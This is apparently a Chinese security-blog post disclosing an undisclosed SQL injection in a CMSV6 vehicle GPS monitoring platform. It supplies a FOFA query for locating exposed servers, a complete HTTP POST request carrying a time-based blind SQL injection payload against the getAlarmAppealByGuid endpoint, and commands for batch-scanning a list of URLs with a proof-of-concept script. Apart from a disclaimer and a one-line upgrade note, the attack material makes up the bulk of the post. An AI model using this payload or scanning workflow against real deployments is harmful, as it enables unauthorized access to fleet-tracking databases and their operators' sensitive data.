【未公开0day】某某星CMSV6某某定位监控 getAlarmAppealByGuid SQL注入漏洞【附poc下载】

免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

fofa语法

复制代码
body="/808gps/"

一、漏洞简述

某某星CMSV6某某定位监控平台是一款专业的车辆管理解决方案,提供实时定位、轨迹回放和状态监控等功能。该平台通过先进的GPS定位技术,帮助企业实现对车队的高效管理,提升运营效率和安全性。用户可以通过友好的界面,实时查看车辆位置、行驶路线和监控数据,支持多种报警功能,确保车辆安全和及时响应。其接口getAlarmAppealByGuid;downloadLogger.action存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、漏洞检测poc

复制代码
POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

guid=1') AND (SELECT 1 FROM (SELECT(SLEEP(6)))w) AND ('1

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

POC下载:POC下载

批量检测:

python CMSV6_getAlarmAppealByGuid_SQLInject.py -f url.txt

单个url检测漏洞:

python CMSV6_getAlarmAppealByGuid_SQLInject.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

相关推荐
盟接之桥2 小时前
盟接之桥说制造:在安全、确定与及时之间,构建品质、交期与反应速度的动态平衡
大数据·运维·安全·汽车·制造·devops
Suckerbin3 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
喜葵3 小时前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
泰迪智能科技4 小时前
案例分享|企微智能会话风控系统:为尚丰盈铝业筑牢沟通安全防线
安全·企业微信
lingggggaaaa5 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
MoloXuanhe6 小时前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc6 小时前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
czijin9 小时前
【论文阅读】Security of Language Models for Code: A Systematic Literature Review
论文阅读·人工智能·安全·语言模型·软件工程
2501_915921439 小时前
iOS混淆工具实战 在线教育直播类 App 的课程与互动安全防护
android·安全·ios·小程序·uni-app·iphone·webview
monster_风铃10 小时前
小补充: IPv6 安全RA
网络·安全·智能路由器